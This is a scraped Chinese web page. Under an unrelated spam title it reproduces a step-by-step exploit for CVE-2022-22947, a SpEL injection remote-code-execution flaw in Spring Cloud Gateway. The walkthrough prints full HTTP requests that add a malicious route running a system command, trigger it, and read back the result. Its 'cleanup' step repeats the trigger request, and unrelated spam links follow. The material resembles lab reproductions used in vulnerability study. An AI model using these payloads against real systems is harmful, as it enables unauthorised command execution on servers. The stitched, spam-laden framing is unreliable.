当前位置: 首页 > news >正文

0基础如何快速做网站脚底长了像水泡一样的东西很痒怎么回事

0基础如何快速做网站,脚底长了像水泡一样的东西很痒怎么回事,怎么建网站做推广,深圳市做网站的Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 参考链接: https://tanzu.vmware.c…

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

参考链接:

https://tanzu.vmware.com/security/cve-2022-22947
https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans

1.首先,发送如下数据包即可添加一个包含恶意SpEL表达式的路由:

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}],"uri": "http://example.com"
}

然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

发送如下数据包即可查看执行结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

最后,发送如下数据包清理现场,删除所添加的路由:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

http://www.yayakq.cn/news/633472/

相关文章:

  • 单位网站建设情况说明书南宁做网站培训
  • 公司网站备案需要哪些开平网站建设公司
  • 网站建设德语网络广告策划与设计
  • 出版社网站必须做企业可信认证嘛图片1600px做网站
  • 劳务输送网站建设方案wp网站建设教程
  • 优秀简历制作网站网络设计方案包括哪些
  • 官方网站怎么推广网站更换服务器
  • 开封做网站的公司拼多多货源一件代发平台
  • 杭州企业网站设计推荐一下网站谢谢
  • 做门票的网站vs做网站登录界面
  • 岫岩县网站建设北京梦创义网站建设
  • 建设网站软件大朗镇做网站
  • 如何建立网站?手机上怎么做钓鱼网站
  • 网站建设公司专业网站企业开发中文网站编辑
  • 广州站停运最新消息WordPress如何加载SSL证书
  • 锦州网站优化理财网站模版
  • 分析网站建设公司网站建设发展趋势
  • 盘锦市建设局网站地址wordpress 升级后 插件
  • dede网站地图htmlwordpress欢迎新会员
  • 天津艺匠做网站怎么样专业的英文网站建设
  • 网站制作公司怎么运营网站使用培训方案
  • 广州网站建站公司名师工作室建设名师网站
  • 网站推广营销wordpress用什么主机好
  • 餐饮加盟网网站建设新网站多久被收录
  • 贵州省住房和建设厅网网站首页网架公司有哪些
  • 启闭机闸门的网站建设免备案国内虚拟主机
  • 怎么在DW网站站点下建立两张网页网站建设属于IT
  • 懒人建站优化网站链接的方法
  • 建设银行人力资源招聘网站网站系统制作教程视频教程
  • 网站最好服务器大连建设工程信息网专家库